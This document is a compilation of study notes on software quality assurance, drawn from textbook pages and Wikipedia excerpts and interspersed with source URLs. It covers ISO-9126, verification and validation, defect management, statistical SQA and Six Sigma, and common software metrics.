A QA framework can help to:

• work out priorities • improve service user involvement in the charity • create better working practices and policies • get the management committee more involved and take more responsibility • improve the physical environment for service users • improve the relationship between volunteers and users.

These frameworks enable community organizations and charities to build standards around the needs of their users, whilst also ensuring that they have processes in place to ensure their own governance and management are complete and up to the task.

Benefits of Quality Assurance Frameworks

Organizations using a QA framework can gain the following benefits:

• more effective and more efficient systems and procedures • better quality of services for users • better communication among staff, trustees and volunteers • increased motivation for staff, trustees and volunteers • greater credibility and legitimacy with funders • more creative thinking, enabling new perspectives and ways of working • organizational learning • continuous improvement over time.

18 WHAT IS SOFTWARE QUALITY?

2.2 QUALITY FRAMEWORKS AND ISO-9126

Based on the different quality views and expectations outlined above, quality can be defined accordingly. In fact, we have already mentioned above various so-called “-ilities” connected to the term quality, such as reliability, usability, portability, maintainability, etc. Various models or frameworks have been proposed to accommodate these different quality views and expectations, and to define quality and related attributes, features, characteristics, and measurements. We next briefly describe ISO-9 126 (ISO, 2001), the mostly influential one in the software engineering community today, and discuss various adaptations of such quality frameworks for specific application environments.

ISO-9126

ISO-9 126 (ISO, 2001) provides a hierarchical framework for quality definition, organized into quality characteristics and sub-characteristics. There are six top-level quality characteristics, with each associated with its own exclusive (non-overlapping) sub-characteristics, as summarized below:

0 Functionality: A set of attributes that bear on the existence of a set of functions and their specified properties. The functions are those that satisfy stated or implied needs. The sub-characteristics include:

- Suitability

- Accuracy

- Interoperability

- Security

0 Reliability: A set of attributes that bear on the capability of software to maintain its level of performance under stated conditions for a stated period of time. The sub-characteristics include:

- Maturity

- Fault tolerance

- Recoverability

0 Usability: A set of attributes that bear on the effort needed for use, and on the individual assessment of such use, by a stated or implied set of users. The sub- characteristics include:

- Understandability

- Learnability

- Operability

0 Efficiency: A set of attributes that bear on the relationship between the level of performance of the software and the amount of resources used, under stated conditions. The sub-characteristics include:

- Time behavior

- Resource behavior

QUALITY FRAMEWORKS AND 180-9126 19

0 Maintainability: A set of attributes that bear on the effort needed to make specified modifications. The sub-characteristics include:

- Analyzability

- Changeability

- Stability

- Testability

0 Portability: A set of attributes that bear on the ability of software to be transferred from one environment to another. The sub-characteristics include:

- Adaptability

- Installability

- Conformance

- Replaceability

Alternative frameworks and focus on correctness

ISO-9 126 offers a comprehensive framework to describe many attributes and properties we associate with quality. There is a strict hierarchy, where no sub-characteristics are shared among quality characteristics. However, certain product properties are linked to multiple quality characteristics or sub-characteristics (Dromey, 1995; Dromey, 1996). For example, various forms of redundancy affect both efficiency and maintainability. Consequently, various alternative quality frameworks have been proposed to allow for more flexible relations among the different quality attributes or factors, and to facilitate a smooth transition from specific quality concerns to specific product properties and metrics.

Many companies and communities associated with different application domains have adapted and customized existing quality frameworks to define quality for themselves, taking into consideration their specific business and market environment. One concrete example of this for companies is the quality attribute list CUPRIMDS (capability, usability, performance, reliability, installation, maintenance, documentation, and service) IBM used for their software products (Kan, 2002). CUPRIMDS is often used together with overall customer satisfaction (thus the acronym CUPRIMDSO) to characterize and measure software quality for IBM’s software products.

Similarly, a set of quality attributes has been identified for web-based applications (Of- futt, 2002), with the primary quality attributes as reliability, usability, and security, and the secondary quality attributes as availability, scalability, maintainability, and time to market. Such prioritized schemes are often used for specific application domains. For example, performance (or efficiency) and reliability would take precedence over usability and maintainability for real-time software products. On the contrary, it might be the other way round for mass market products for end users.

Among the software quality characteristics or attributes, some deal directly with the functional correctness, or the conformance to specifications as demonstrated by the absence of problems or instances of non-conformance. Other quality characteristics or attributes deal with usability, portability, etc. Correctness is typically related to several quality characteristics or sub-characteristics in quality frameworks described above. For example, in ISO-9 126 it is related to both functionality, particularly its accuracy (in other words, conformance) sub-characteristics, and reliability.

Verification and Validation • Validation: Are we building the right system? • Verification: Are we building the system right?

Verification looks at the software product and ensures it has been designed and built to specifications, and is free of defects. Validation confirms with the user that everything is working correctly and to their expectations.

In other words, validation is checking that the system will meet the customer’s needs while verification is checking whether the system is well-engineered, without error, etc. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

IEEE standard in its 4th edition defines the two terms as follows:

• « Validation. The assurance that a product, service, or system meets the needs of the customer and other identified stakeholders. It often involves acceptance and suitability with external customers. Contrast with verification. »

• « Verification. The evaluation of whether or not a product, service, or system complies with a regulation, requirement, specification, or imposed condition. It is often an internal process. Contrast with validation. »

ISO 9001 standard defines them this way :

• Verification is the conformation that a product meets identified specifications. • Validation is the conformation that a product appropriately meets its design

function or the intended use

http://www.focus-corporation.com/services/software-validation-testing

http://en.wikipedia.org/wiki/IEEE

http://www.richardrandall.com/pubs/ISO9k2k/iso9k2k-7_3.html

In other words, validation is concerned with checking that the system will meet the customer’s actual needs, while verification is concerned with whether the system is well-engineered, error-free, and so on. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

The distinction between the two terms is largely to do with the role of specifications. Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

Verification includes all the activities associated with the producing high quality software: testing, inspection, design analysis, specification analysis, and so on. It is a relatively objective process, in that if the various products and documents are expressed precisely enough, no subjective judgments should be needed in order to verify software.

In contrast, validation is an extremely subjective process. It involves making subjective assessments of how well the (proposed) system addresses a real-world need. Validation includes activities such as requirements modeling, prototyping and user evaluation.

In a traditional phased software lifecycle, verification is often taken to mean checking that the products of each phase satisfy the requirements of the previous phase. Validation is relegated to just the beginning and ending of the project: requirements analysis and acceptance testing. This view is common in many software engineering textbooks, and is misguided. It assumes that the customer’s requirements can be captured completely at the start of a project, and that those requirements will not

change while the software is being developed. In practice, the requirements change throughout a project, partly in reaction to the project itself: the development of new software makes new things possible. Therefore both validation and verification are needed throughout the lifecycle.

Verification Techniques

There are many different verification techniques but they all basically fall into 2 major categories - dynamic testing and static testing.

• Dynamic testing - Testing that involves the execution of a system or component. Basically, a number of test cases are chosen, where each test case consists of test data. These input test cases are used to determine output test results. Dynamic testing can be further divided into three categories - functional testing, structural testing, and random testing.

• Functional testing - Testing that involves identifying and testing all the functions of the system as defined within the requirements. This form of testing is an example of black-box testing since it involves no knowledge of the implementation of the system.

• Structural testing - Testing that has full knowledge of the implementation of the system and is an example of white-box testing. It uses the information from the internal structure of a system to devise tests to check the operation of individual components. Functional and structural testing both chooses test cases that investigate a particular characteristic of the system.

• Random testing - Testing that freely chooses test cases among the set of all possible test cases. The use of randomly determined inputs can detect faults that go undetected by other systematic testing techniques. Exhaustive testing, where the input test cases consists of every possible set of input values, is a form of random testing. Although exhaustive testing performed at every stage in the life cycle results in a complete verification of the system, it is realistically impossible to accomplish. [Andriole86]

• Static testing - Testing that does not involve the operation of the system or component. Some of these techniques are performed manually while others are automated. Static testing can be further divided into 2 categories - techniques that analyze consistency and techniques that measure some program property.

• Consistency techniques - Techniques that are used to insure program properties such as correct syntax, correct parameter matching between procedures, correct typing, and correct requirements and specifications translation.

• Measurement techniques - Techniques that measure properties such as error proneness, understandability, and well-structured.

Validation

Validation can be performed progressively throughout the development life cycle. For example, written user requirements can be validated by creating a model or prototype and asking the user to confirm (or validate) that the demonstrated functionality meets their needs. System testing is a major validation event where a system is validated

http://www.chambers.com.au/glossary/prototype.php

against the user's statement of requirement. It aims to show that all faults which could degrade system performance have been removed before the system is operated. Validation is not complete however until the end user formally agrees that the operational system is fit for purpose.

Validation Techniques

There are also numerous validation techniques, including formal methods, fault injection, and dependability analysis. Validation usually takes place at the end of the development cycle, and looks at the complete system as opposed to verification, which focuses on smaller sub-systems.

• Formal methods - Formal methods is not only a verification technique but also a validation technique. Formal methods means the use of mathematical and logical techniques to express, investigate, and analyze the specification, design, documentation, and behavior of both hardware and software.

• Fault injection - Fault injection is the intentional activation of faults by either hardware or software means to observe the system operation under fault conditions.

• Hardware fault injection - Can also be called physical fault injection because we are actually injecting faults into the physical hardware.

• Software fault injection - Errors are injected into the memory of the computer by software techniques. Software fault injection is basically a simulation of hardware fault injection.

• Dependability analysis - Dependability analysis involves identifying hazards and then proposing methods that reduces the risk of the hazard occurring.

• Hazard analysis - Involves using guidelines to identify hazards, their root causes, and possible countermeasures.

• Risk analysis - Takes hazard analysis further by identifying the possible consequences of each hazard and their probability of occurring.

Most quality assurance activities which are carried out directly in the software development process can be classified as verification activities, while quality assurance activities which are associated with the technical requirements of the users at the very beginning or at the very end of the engineering process are classified as validation activities

http://qatestlab.com/services/service-models/offshore-software-quality-assurance-qa/

http://qatestlab.com/services/our-qa-services/independent-validation-and-verification/

http://qatestlab.com/services/our-qa-services/independent-validation-and-verification/

Advantages of Software Verification :

1. Verification helps in lowering down the count of the defect in the later stages of development.

2. Verifying the product at the starting phase of the development will help in understanding the product in a better way.

3. It reduces the chances of failures in the software application or product. 4. It helps in building the product as per the customer specifications and needs.

Advantages of Validation:

1. During verification if some defects are missed then during validation process it can be caught as failures.

2. If during verification some specification is misunderstood and development had happened then during validation process while executing that functionality the difference between the actual result and expected result can be understood.

3. Validation is done during testing like feature testing, integration testing, system testing, load testing, compatibility testing, stress testing, etc.

4. Validation helps in building the right product as per the customer’s requirement and helps in satisfying their needs.

Defect taxonomy A defect is a structural property of a software document of any kind (e.g. requirements description, test plan, source code, configuration file), namely a deviation from the nearest (i.e. most similar) correct document that makes the document incorrect or locally incorrect. A taxonomy is a system of hierarchical categories designed to be a useful aid for reproducibly classifying things.

Purpose of a defect taxonomy

The following considerations assume that defects are recorded when they are found throughout the software process, including their classification according to the defect taxonomy. Then a defect taxonomy can serve one or several of the following purposes:

• Understanding process characteristics: Recording defects and classifying them can help understand the process with respect to all those activities that produce defects. In particular, they help in identifying process weaknesses (high-defect steps).

• Understanding product characteristics: o Identifying points needing rework: Clusters of defects point to

documents that need rework. o Suggesting rework approaches: The kinds of defects may point out the

best approach for doing the rework (e.g. direct repair, review, redesign, retest, etc.)

• Providing project guidance: Defect characteristics of artifacts may help with risk assessment for process decisions such as task priorities, go/no-go decisions, reimplementation decisions etc.

A Good Defect Taxonomy for Testing Purposes

1. Is expandable and ever-evolving

2. Has enough detail for a motivated, intelligent newcomer to be able to understand it and learn about the types of problems to be tested for

3. Can help someone with moderate experience in the area (like me) generate test ideas and raise issues

Most practical implementation of defect taxonomies is Brainstorming of Test Ideas in a systematic manner

Defect management Software defects are expensive. Moreover, the cost of finding and correcting defects represents one of the most expensive software development activities. For the foreseeable future, it will not be possible to eliminate defects. While defects may be inevitable, we can minimize their number and impact on our projects. To do this development teams need to implement a defect management process that focuses on preventing defects, catching defects as early in the process as possible, and minimizing the impact of defects. A little investment in this process can yield significant returns.

principles The defect management process is based on the following general principles: The primary goal is to prevent defects. Where this is not possible or practical, the goals are to both find the defect as quickly as possible and minimize the impact of the defect. The defect management process should be risk driven -- i.e., strategies, priorities, and resources should be based on the extent to which risk can be reduced. Defect measurement should be integrated into the software development process and be used by the project team to improve the process. In other words, the project staff, by doing their job, should capture information on defects at the source. It should not be done after-the-fact by people unrelated to the project or system As much as possible, the capture and analysis of the information should be automated. Defect information should be used to improve the process. This, in fact, is the primary reason for gathering defect information. Most defects are caused by imperfect or flawed processes. Thus to prevent defects, the process must be altered.

Defect Management process plays key role during Software Testing life cycle, Since one of the objectives of testing is to find defects, the discrepancies between actual and expected outcomes need to be logged as defects or bugs or incidents. In order to manage all defects to completion, an organization should establish a process and rules for classification. Defects may be raised during development, review, testing or use of a software product. They may be raised for issues in code or the working system, or in any type of

http://www.defectmanagement.com/defectmanagement/risk.htm

http://www.defectmanagement.com/defectmanagement/risk.htm

documentation including development documents, test documents or user information such as “Help "or installation guides. Defect reports have the following objectives:

- Provide developers and other parties with feedback about the problem to enable identification, isolation and correction as necessary. - Provide test leaders a means of tracking the quality of the system under test and the progress of the testing. - Provide ideas for test process improvement. A tester or reviewer typically logs the following information, if known, regarding an Defect: - Date of issue, issuing organization, author, approvals and status. - Scope, severity and priority of the incident. - References, including the identity of the test case specification that revealed the problem. Details of the Defect report may include: - defect Title and summary - Defect Description with steps to reproduce - Expected and actual results. - Date the incident was discovered. - Identification or configuration item of the software or system. - Software or system life cycle process in which the incident was observed. - Description of the anomaly to enable resolution. - Degree of impact on stakeholder(s) interests. - Severity of the impact on the system. - Urgency/priority to fix. - Status of the incident like open, deferred, duplicate, waiting to be fixed, fixed awaiting confirmation test or closed. - Conclusions and recommendations. - Global issues, such as other areas that may be affected by a change resulting from the defect. - Change history, such as the sequence of actions taken by project team members with respect to the incident to isolate, repair and confirm it as fixed.

Defect management Process

Defect can be defined as an unexpected behavior of the software. No software exists without a defect or bug. The elimination of bugs from the software depends upon the efficiency of testing done on the software. A defect is basically the difference between the expected result and the actual result.

A defect is a specific concern about the quality of an Application under Test (AUT).

The cost of finding and correcting defects represents one of the most expensive software development activities. Defect should be finding as early as possible in the software to reduce the cost of fixing of the bugs. If a defect found later phase in the software, the cost of the fixing that bug becomes high.

It is fact that it will not be possible to eliminate all defects from the software. While defects may be inevitable, we can minimize their number and impact on our projects. To do this, project management team needs to implement a defect management process (DMP) that focuses on preventing defects, finding defects as early as possible in the process, and minimizing the impact of defects.

Defect Management Process:

The defect management process is based on the following general principles:

There are following parts to manage the process:

Defect Prevention, Baseline delivery, Defect Discovery, Defect Resolution and Process Improvement.

Defect management process can be understood by diagrammatically:

Defect Management Process

Defect Prevention: It is a process of improving quality and productivity by preventing the injection of defects into a software product. It is virtually impossible to eliminate the defects altogether.

Objective of defect Prevention process are:

1. Identify and analyze the causes of defect, so that we reduce the occurrence of defect.

2. Reduction in number of defect category. 3. Reduce most frequent type of defects such as “not following coding guidelines”

or Ambiguity within requirement and specification. 4. Reduction in the extent of defect escapes between the test phase and the

release. 5. Establish practice within projects to identify defects early in the process. 6. Set goals for improving critical processes with team-level accountability. 7. It is practically impossible to prevent the defects in the software. So testers and

developers should collaborate for quick detection of defects and minimize the

https://intensetesting.files.wordpress.com/2014/06/defect-management-process.png

risk. They should assess the critical risk associated with the system and identified the defects.

Baseline delivery: This process appears in the DMP when:

A predefined milestone is finished then product is baselined. Further development work continues from one stage to another stage to complete another milestone. A product should be considered baselined when developers pass it to the testes for testing.

Defect Discovery: A defect is said to be discovered when it is brought to the attention of the developers and acknowledged (i.e., “Accepted”) to be valid one. Team should find defects before they become major problems. As soon as team finds the defects, they should report them so that those can be resolved. Team should also make sure that defects should be acknowledged by developers and should be valid one.

Defect Resolutions: A resolution process needs to be established for use in the process where there is a dispute regarding a defect. For example, if the group uncovering the defect believes it is a defect but the developers do not, a quick-resolution process must be in place.

The 2 recommended processes:

o A senior manager of the software department will be selected to resolve the dispute.

o Arbitration by the software owner – The problem should be discussed with the product owner to determine whether or not the problem is a defect.

Process Improvement:

Everyone has different view on process improvement. Developer thinks that defect is not a big deal, but there was a defect it was a big deal.

Testers thought that If this defect could have gotten later into the process before it was captured, there can be other defects may be present that have not been discovered. For customer’s point of view, a defect can be anything that dissatisfies the customers whether it was in requirement, designing, coding or testing.

Program leadership advice the teams that efforts should be made to analyze the process and find out the cause behind the defects and also analyze the fact to prevent such defects.

So what can we do to improve the process? There are some goals of Defect management process:

• Senior management must understand, support, and be a part of the Defect Management Program.

• The Defect Management process should be integrated into the overall software development process and used by the team to improve the process.

• If we have automated script for the project, we should use those to find out bugs as early as possible.

• Specific development approaches (e.g., testing, inspections, reviews, exit criteria etc.) should be chosen based on project objectives.

• The efforts which use to improve the process should be driven by the measurement process: metrics, reporting and decision making etc.

• The defect management process should be risk driven. • We can reduce the occurrence of defects by following points: • By reviewing test scenarios and test cases • By defining exit Criteria for Developer testing • By defining QA acceptance of Development • Functional/Non-functional Requirements • Technical requirements • Environment baselines • GUI checklists prior to test case execution

We can use critical metrics to implement the process improvement

Critical metrics is a joint session of,

• What can we do to ensure that more of defects are found earlier in the cycle? • Last minute discoveries of defects have been analyzed to determine why they

were missed in our normal SIT test cycle? • When these issues are found late in the cycle, what is done to ensure that we

catch them next time? • This is stemming from the way our business team is doing their testing (ad-hoc

testing coming late, late in the process).

Calculating Metrics and Phases

Below are the few points which should be include when calculate the metrics:

• % Complete • % Defects Corrected • % Test Coverage • % Rework • % Test Cases Passed • % Test Effectiveness • % Test Cases Blocked • % Test Efficiency • First Run Fail Rate • Defect Discovery Rate • Overall Fail Rate

Identified Critical Risk: There are few challenges which can affect the critical metrics.

o Technology Risk o No advanced technology available or the existing technology is in initial

stages. o Tight target dates o Limited budget o Bottlenecks within the Development & Testing cycles o Resource constraints o Continues changing in the requirements

Types of Errors: There are few errors which we generally face. If we keep those in mind during software development, we can find more defects early in the software development process and provide support in the improvement of the DMP.

Human Errors Omission:

o Knowledge: Lack of knowledge of application. o Ignorance: Nature of ignorance. o Informational: Lack of information. o Process- Related: Lack of knowledge of process.

• Translation: o Miscommunication: Perception to understand the requirement. o Mismatch in solution and requirement: Whatever built does not match with

the requirements. o Mismatch with requirement and test case: Test cases do not match with

the requirement so it is very necessary to check the complete requirement first and then take a decision.

Design and Coding

o Affect Data Integrity: Affect on the consistency and accuracy of data throughout the software development life cycle.

o Alter Correctly stored data: Did some mistake while altering data which is correctly stored in DB.

o Affect downstream system dependencies : Affect the system dependencies

o Affect testing outcomes: If something wrong build in the code, that can affect outcome of the testing.

Testing

• Failure to notice a problem • Misreading the screen • Failure to execute a planned test • Criteria disagreements

16.5 STATISTICAL SOFTWARE QUALITY ASSURANCE

Statistical quality assurance reflects a growing trend throughout industry to become

more quantitative about quality. For software, statistical quality assurance implies

the following steps:

1. Information about software errors and defects is collected and categorized.

2. An attempt is made to trace each error and defect to its underlying cause

(e.g., nonconformance to specifications, design error, violation of standards,

poor communication with the customer).

3. Using the Pareto principle (80 percent of the defects can be traced to 20 per-

cent of all possible causes), isolate the 20 percent (the vital few).

4. Once the vital few causes have been identified, move to correct the problems

that have caused the errors and defects.

This relatively simple concept represents an important step toward the creation of

an adaptive software process in which changes are made to improve those elements

of the process that introduce error.

16.5.1 A Generic Example

To illustrate the use of statistical methods for software engineering work, assume

that a software engineering organization collects information on errors and defects

for a period of one year. Some of the errors are uncovered as software is being de-

veloped. Others (defects) are encountered after the software has been released to its

end users. Although hundreds of different problems are uncovered, all can be

tracked to one (or more) of the following causes:

• Incomplete or erroneous specifications (IES)

• Misinterpretation of customer communication (MCC)

What stepsare required

to performstatistical SQA?

?

uote:

“A statisticalanalysis, properlyconducted, is adelicate dissectionof uncertainties,a surgery ofsuppositions.”

M. J. Moroney

pre75977_ch16.qxd 11/27/08 6:07 PM Page 439

Statistics and measurements

http://www.gslis

• Intentional deviation from specifications (IDS)

• Violation of programming standards (VPS)

• Error in data representation (EDR)

• Inconsistent component interface (ICI)

• Error in design logic (EDL)

• Incomplete or erroneous testing (IET)

• Inaccurate or incomplete documentation (IID)

• Error in programming language translation of design (PLT)

• Ambiguous or inconsistent human/computer interface (HCI)

• Miscellaneous (MIS)

To apply statistical SQA, the table in Figure 16.2 is built. The table indicates that IES,

MCC, and EDR are the vital few causes that account for 53 percent of all errors. It

should be noted, however, that IES, EDR, PLT, and EDL would be selected as the vital

few causes if only serious errors are considered. Once the vital few causes are

determined, the software engineering organization can begin corrective action. For

example, to correct MCC, you might implement requirements gathering techniques

(Chapter 5) to improve the quality of customer communication and specifications. To

improve EDR, you might acquire tools for data modeling and perform more stringent

data design reviews.

It is important to note that corrective action focuses primarily on the vital few. As

the vital few causes are corrected, new candidates pop to the top of the stack.

Statistical quality assurance techniques for software have been shown to provide

substantial quality improvement [Art97]. In some cases, software organizations


Total Serious Moderate Minor

Error No. % No. % No. % No. %

IES 205 22% 34 27% 68 18% 103 24%

MCC 156 17% 12 9% 68 18% 76 17%

IDS 48 5% 1 1% 24 6% 23 5%

VPS 25 3% 0 0% 15 4% 10 2%

EDR 130 14% 26 20% 68 18% 36 8%

ICI 58 6% 9 7% 18 5% 31 7%

EDL 45 5% 14 11% 12 3% 19 4%

IET 95 10% 12 9% 35 9% 48 11%

IID 36 4% 2 2% 20 5% 14 3%

PLT 60 6% 15 12% 19 5% 26 6%

HCI 28 3% 3 2% 17 4% 8 2%

MIS 56 6% 0 0% 15 4% 41 9%

Totals 942 100% 128 100% 379 100% 435 100%

FIGURE 16.2

Data collectionfor statisticalSQA

uote:

“20 percent of thecode has 80percent of theerrors. Find them,fix them!”

Lowell Arthur

pre75977_ch16.qxd 11/27/08 6:07 PM Page 440

have achieved a 50 percent reduction per year in defects after applying these

techniques.

The application of the statistical SQA and the Pareto principle can be summarized

in a single sentence: Spend your time focusing on things that really matter, but first be

sure that you understand what really matters!

16.5.2 Six Sigma for Software Engineering

Six Sigma is the most widely used strategy for statistical quality assurance in indus-

try today. Originally popularized by Motorola in the 1980s, the Six Sigma strategy

“is a rigorous and disciplined methodology that uses data and statistical analysis to

measure and improve a company’s operational performance by identifying and elim-

inating defects’ in manufacturing and service-related processes” [ISI08]. The term

Six Sigma is derived from six standard deviations—3.4 instances (defects) per million

occurrences—implying an extremely high quality standard. The Six Sigma method-

ology defines three core steps:

• Define customer requirements and deliverables and project goals via well-

defined methods of customer communication.

• Measure the existing process and its output to determine current quality

performance (collect defect metrics).

• Analyze defect metrics and determine the vital few causes.

If an existing software process is in place, but improvement is required, Six Sigma

suggests two additional steps:

• Improve the process by eliminating the root causes of defects.

• Control the process to ensure that future work does not reintroduce the

causes of defects.

These core and additional steps are sometimes referred to as the DMAIC (define,

measure, analyze, improve, and control) method.

If an organization is developing a software process (rather than improving an

existing process), the core steps are augmented as follows:

• Design the process to (1) avoid the root causes of defects and (2) to meet

customer requirements.

• Verify that the process model will, in fact, avoid defects and meet customer

requirements.

This variation is sometimes called the DMADV (define, measure, analyze, design,

and verify) method.

A comprehensive discussion of Six Sigma is best left to resources dedicated to the

subject. If you have further interest, see [ISI08], [Pyz03], and [Sne03].


What are thecore steps of

the Six Sigmamethodology?

?

pre75977_ch16.qxd 11/27/08 6:07 PM Page 441

measurements A software metric is a measure of some property of a piece of software or its specifications. The goal is obtaining objective, reproducible and quantifiable measurements, which may have numerous valuable applications in schedule and budget planning, cost estimation, quality assurance testing, software debugging, software performance optimization, and optimal personnel task assignments.

Software quality metrics are a subset of software metrics that focus on the quality aspects of the product, process, and project.

Common software measurements include:

Balanced scorecard

The balanced scorecard (BSC) is a strategy performance management tool - a semi-standard structured report, supported by design methods and automation tools, that can be used by managers to keep track of the execution of activities by the staff within their control and to monitor the consequences arising from these actions.[1]

The critical characteristics that define a Balanced Scorecard are[2]

• its focus on the strategic agenda of the organization concerned • the selection of a small number of data items to monitor • a mix of financial and non-financial data items.

Code coverage

code coverage is a measure used to describe the degree to which the source code of a program is tested by a particular test suite. A program with high code coverage has been more thoroughly tested and has a lower chance of containing software bugs than a program with low code coverage. Many different metrics can be used to calculate code coverage; some of the most basic are the percent of program subroutines and the percent of program statements called during execution of the test suite.

Cohesion

cohesion refers to the degree to which the elements of a module belong together.[1] Thus, it is a measure of how strongly related each piece of functionality expressed by the source code of a software module is.

Cohesion is an ordinal type of measurement and is usually described as “high cohesion” or “low cohesion”. Modules with high cohesion tend to be preferable because high cohesion is associated with several desirable traits of software including robustness,

http://en.wikipedia.org/wiki/Software

http://en.wikipedia.org/wiki/Performance_management

http://en.wikipedia.org/wiki/Reporting

http://en.wikipedia.org/wiki/Balanced_scorecard%23cite_note-2GC_Survey-1

http://en.wikipedia.org/wiki/Balanced_scorecard%23cite_note-What_is_BSC_FAQ-2

http://en.wikipedia.org/wiki/Source_code

http://en.wikipedia.org/wiki/Computer_program

http://en.wikipedia.org/wiki/Test_suite

http://en.wikipedia.org/wiki/Software_bug

http://en.wikipedia.org/wiki/Subroutine

http://en.wikipedia.org/wiki/Statement_%28computer_science%29

http://en.wikipedia.org/wiki/Module_%28programming%29

http://en.wikipedia.org/wiki/Cohesion_%28computer_science%29%23cite_note-FOOTNOTEYourdonConstantine1979-1


http://en.wikipedia.org/wiki/Level_of_measurement%23Ordinal_scale

http://en.wikipedia.org/wiki/Measurement

http://en.wikipedia.org/wiki/Robustness_%28computer_science%29

reliability, reusability, and understandability whereas low cohesion is associated with undesirable traits such as being difficult to maintain, difficult to test, difficult to reuse, and even difficult to understand.

Coupling

coupling or dependency is the degree to which each program module relies on each one of the other modules.

Coupling is usually contrasted with cohesion. Low coupling often correlates with high cohesion, and vice versa. Low coupling is often a sign of a well-structured computer system and a good design, and when combined with high cohesion, supports the general goals of high readability and maintainability.

Cyclomatic complexity

Cyclomatic complexity is a software metric (measurement). It is a quantitative measure of the complexity of programming instructions. It directly measures the number of linearly independent paths through a program's source code.

Cyclomatic complexity is computed using the control flow graph of the program: the nodes of the graph correspond to indivisible groups of commands of a program, and a directed edge connects two nodes if the second command might be executed immediately after the first command. Cyclomatic complexity may also be applied to individual functions, modules, methods or classes within a program.

One testing strategy, called basis path testing by McCabe who first proposed it, is to test each linearly independent path through the program; in this case, the number of test cases will equal the cyclomatic complexity of the program

Function point

A function point is a unit of measurement to express the amount of business functionality an information system (as a product) provides to a user. Function points measure software size. The cost (in dollars or hours) of a single unit is calculated from past projects.

The use of function points in favor of lines of code seek to address several additional issues:

• The risk of "inflation" of the created lines of code, and thus reducing the value of the measurement system, if developers are incentivized to be more productive. FP advocates refer to this as measuring the size of the solution instead of the size of the problem.


http://en.wikipedia.org/wiki/Cohesion_%28computer_science%29

http://en.wikipedia.org/wiki/Computer



http://en.wikipedia.org/wiki/Software_metric


http://en.wikipedia.org/wiki/Control_flow_graph

http://en.wikipedia.org/wiki/Graph_%28mathematics%29

http://en.wikipedia.org/wiki/Directed_graph

http://en.wikipedia.org/wiki/Function_%28computer_science%29

http://en.wikipedia.org/wiki/Modular_programming

http://en.wikipedia.org/wiki/Method_%28computer_science%29

http://en.wikipedia.org/wiki/Class_%28computer_science%29

http://en.wikipedia.org/wiki/Software_testing

http://en.wikipedia.org/wiki/Basis_path_testing

http://en.wikipedia.org/wiki/Information_system

• Lines of Code (LOC) measures reward low level languages because more lines of code are needed to deliver a similar amount of functionality to a higher level language.[5] C. Jones offers a method of correcting this in his work.[6]

• LOC measures are not useful during early project phases where estimating the number of lines of code that will be delivered is challenging. However, Function Points can be derived from requirements and therefore are useful in methods such as estimation by proxy.

A function can be defined as a collection of executable statements that performs a certain task, together with declarations of the formal parameters and local variables manipulated by those statements (Conte et al., 1986). The ultimate measure of software productivity is the number of functions a development team can produce given a certain amount of resource, regardless of the size of the software in lines of code.

DSQI

DSQI (design structure quality index)[1] is an architectural design metric used to evaluate a computer program's design structure and the efficiency of its modules. The metric was developed by the United States Air Force Systems Command.

The result of DSQI calculations is a number between 0 and 1. The closer to 1, the higher the quality. It is best used on a comparison basis, i.e., with previous successful projects.

Instruction path length

In computer performance, the instruction path length is the number of machine code instructions required to execute a section of a computer program. The total path length for the entire program could be deemed a measure of the algorithm's performance on a particular computer hardware. The path length of a simple conditional instruction would normally be considered as equal to 2, one instruction to perform the comparison and another to take a branch if the particular condition is satisfied. The length of time to execute each instruction is not normally considered in determining path length and so path length is merely an indication of relative performance rather than in any sense absolute.

When executing a benchmark program, most of the instruction path length is typically inside the program's inner loop.

Source lines of code

Source lines of code (SLOC), also known as lines of code (LOC), is a software metric used to measure the size of a computer program by counting the number of lines in the text of the program's source code. SLOC is typically used to predict the amount of effort that will be required to develop a program, as well as to estimate programming productivity or maintainability once the software is produced.

http://en.wikipedia.org/wiki/Source_lines_of_code

http://en.wikipedia.org/wiki/Function_point%23cite_note-5

http://en.wikipedia.org/wiki/Function_point%23cite_note-6

http://en.wikipedia.org/wiki/DSQI%23cite_note-1

http://en.wikipedia.org/wiki/Program_development_cycle%23Planning



http://en.wikipedia.org/wiki/Air_Force_Systems_Command

http://en.wikipedia.org/wiki/Computer_performance

http://en.wikipedia.org/wiki/Machine_code


http://en.wikipedia.org/wiki/Algorithm

http://en.wikipedia.org/wiki/Computer_hardware

http://en.wikipedia.org/wiki/Benchmark_program

http://en.wikipedia.org/wiki/Inner_loop






http://en.wikipedia.org/wiki/Programming_productivity



http://en.wikipedia.org/wiki/Maintainability

execution time

execution time is the time during which a program is running (executing), in contrast to other phases of a program's lifecycle such as compile time, link time, load time, etc.

A run-time error is detected after or during the execution of a program, whereas a compile-time error is detected by the compiler before the program is ever executed. Type checking, register allocation, code generation, and code optimization are typically done at compile time, but may be done at run time depending on the particular language and compiler.

Program load time : loading time of the code

Program size : size of the code

three groups of software quality metrics: product quality, in-process quality, and maintenance quality. I. Product Quality Metrics software quality consists of two levels: intrinsic product quality and customer satisfaction. _ Mean time to failure _ Defect density _ Customer problems _ Customer satisfaction. Intrinsic product quality is usually measured by the number of “bugs” (functional defects) in the software or by how long the software can run before encountering a “crash.” In operational definitions, the two metrics are defect density (rate) and mean time to failure (MTTF). The two metrics are correlated but are different enough to merit close attention. First, one measures the time between failures, the other measures the defects relative to the software size (lines of code, function points, etc.). The Defect Density Metric 1. Lines of Code _ Count only executable lines. _ Count executable lines plus data definitions. _ Count executable lines, data definitions, and comments. _ Count executable lines, data definitions, comments, and job control language.

http://en.wikipedia.org/wiki/Execution_%28computing%29

http://en.wikipedia.org/wiki/Compile_time

http://en.wikipedia.org/wiki/Link_time

http://en.wikipedia.org/wiki/Load_time

http://en.wikipedia.org/wiki/Execution_%28computing%29

http://en.wikipedia.org/wiki/Compiler

http://en.wikipedia.org/wiki/Type_checking

http://en.wikipedia.org/wiki/Register_allocation

http://en.wikipedia.org/wiki/Code_generation_%28compiler%29

http://en.wikipedia.org/wiki/Code_optimization

http://en.wikipedia.org/wiki/Loader_%28computing%29

http://en.wikipedia.org/wiki/Binary_file

